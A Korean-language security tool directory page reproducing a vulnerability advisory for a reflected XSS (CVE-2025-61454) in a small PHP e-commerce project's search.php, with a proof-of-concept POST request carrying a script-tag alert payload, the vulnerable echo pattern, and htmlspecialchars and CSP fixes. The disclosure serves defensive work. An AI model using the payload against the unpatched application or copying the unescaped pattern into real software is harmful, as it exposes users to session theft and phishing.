Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-61454 — CVE-2025-61454에 대한 공개 공개 및 개념 증명, E-commerce Project v1.0의 search.php에 있는 반사형 XSS 취약점으로, 악용 단계와 수정 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/tansique-17/cve-2025-61454
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPapers & ResearchLearning & Education
GitHubtansique-17/cve-2025-61454

CVE-2025-61454

CVE-2025-61454에 대한 공개 공개 및 개념 증명, E-commerce Project v1.0의 search.php에 있는 반사형 XSS 취약점으로, 악용 단계와 수정 지침을 포함합니다.

저장소 보기
10개월 전아직 검토되지 않음
웹사이트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ CVE 공개: CVE-2025-61454 — 전자상거래 프로젝트의 반사형 XSS

공개 날짜: 2025년 10월 14일
CVE ID: CVE-2025-61454
심각도: 중간 (CVSS 6.1)


🧩 요약

E-commerce Project v1.0의 search.php 엔드포인트에 반사형 교차 사이트 스크립팅(XSS) 취약점이 존재합니다. search 매개변수의 무결화되지 않은 입력이 응답 HTML에 직접 반영되어, 공격자가 악성 링크를 방문하거나 조작된 요청을 제출한 사용자의 브라우저에서 임의의 JavaScript를 실행할 수 있습니다.

이 문제에는 CVE-2025-61454 식별자가 할당되었습니다. 공개 시점 기준으로 공급업체에서 패치가 출시되지 않았습니다.


📦 영향을 받는 제품

  • 공급업체: 독립 (Bhabishya-123)
  • 프로젝트: E-commerce
  • 버전: v1.0
  • 파일: search.php
  • 취약한 엔드포인트:
    http://localhost/e-commerce-main/search.php

🔬 취약점 세부 정보

서버는 POST 데이터의 search 매개변수를 응답 HTML에 반영하기 전에 제대로 무결화하지 못합니다. 이로 인해 공격자가 JavaScript 페이로드를 주입하여 클라이언트 측 코드 실행을 유발할 수 있습니다.

공격자는 스크립트 유사 콘텐츠가 포함된 입력을 구성하여 취약한 POST 엔드포인트로 전송합니다. 서버가 적절한 HTML/속성/JS 인코딩을 적용하지 않고 입력을 HTML 응답에 반영하므로, 브라우저는 반영된 콘텐츠를 실행 가능한 마크업으로 처리하여 실행합니다. 이는 반사형(비영구적) XSS 시나리오입니다. 공격자는 피해자가 요청을 수행하거나 특수하게 구성된 링크/양식을 방문하도록 유도해야 합니다.

취약한 코드 패턴 (가상):

root@kitploit:~
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";

📌 CWE 분류

CWE ID제목
CWE-79웹 페이지 생성 중 입력 무결화 부재 ('교차 사이트 스크립팅')

📊 CVSS v3.1 점수

점수심각도벡터 문자열
6.1중간CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

💥 영향

성공적인 악용으로 인해 발생할 수 있는 결과:

  • 🧠 임의 JavaScript 실행
  • 🎭 HTML 주입을 통한 피싱 또는 사칭
  • 🍪 세션 하이재킹 또는 토큰 탈취
  • 🚨 강제 리디렉션 또는 악성코드 전달
  • 🎣 가짜 로그인 양식을 통한 자격 증명 수집
  • 📊 검색 결과 페이지 변조

🧪 개념 증명 (PoC)

1. 저장소 복제

root@kitploit:~
git clone https://github.com/Bhabishya-123/E-commerce.git

2. 로컬 호스팅

XAMPP/LAMP를 사용하여 프로젝트를 배포하고 애플리케이션에 접근합니다.

3. 취약점 악용

📥 샘플 요청

root@kitploit:~
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded

search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=

📋 디코딩된 페이로드

root@kitploit:~
search=yxo9p<script>alert(1)</script>xnzmd&submit=

📋 주입된 페이로드

root@kitploit:~
yxo9p<script>alert(1)</script>xnzmd

설명:
페이로드 <script>alert(1)</script>가 search 매개변수에 포함되어 있습니다. 피해자가 이 악성 페이로드가 포함된 검색 양식을 제출하면(또는 사회공학을 통해 제출하도록 속임), JavaScript가 피해자의 브라우저 컨텍스트에서 실행됩니다.

4. 예상 결과

취약한 경우, 브라우저는 JavaScript 코드를 실행하여 1 값을 표시하는 경고 상자를 띄웁니다. 이는 XSS 악용 성공을 확인합니다.


🔐 권장 사항

  • ✅ HTML 렌더링 전에 모든 신뢰할 수 없는 출력을 인코딩하려면 htmlspecialchars() 또는 이에 상응하는 함수를 사용하세요.
  • 🧰 모든 양식 입력, 특히 search 매개변수에 대한 서버 측 입력 검증을 구현하세요.
  • 🧱 인라인 스크립트 실행을 방지하기 위해 강력한 콘텐츠 보안 정책(CSP) 헤더를 설정하세요.
  • 🚫 무결화되지 않은 사용자 입력을 HTML 응답에 직접 포함하지 마세요.
  • 🔒 컨텍스트(HTML, JavaScript, URL, CSS)에 따라 적절한 출력 인코딩을 구현하세요.
  • 🛡️ 자동 XSS 보호 기능을 제공하는 최신 프레임워크를 사용하세요.

✅ 수정 예시

root@kitploit:~
$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";

🛡️ 콘텐츠 보안 정책 예시

root@kitploit:~
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'

📆 타임라인

이벤트날짜
취약점 발견2025년 9월 16일
공개 공개2025년 10월 13일
패치 제공❌ 공개 시점 기준 제공되지 않음

🙋‍♂️ 크레딧

이 취약점은 다음에 의해 발견 및 공개되었습니다:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 참고 자료

  • OWASP - XSS
  • CWE-79 - XSS 분류
  • PortSwigger - 교차 사이트 스크립팅
  • CVE.org의 CVE-2025-61454

💬 공식 공급업체 패치가 없어 이 권고는 독립적으로 게시되었습니다.

도구 다운로드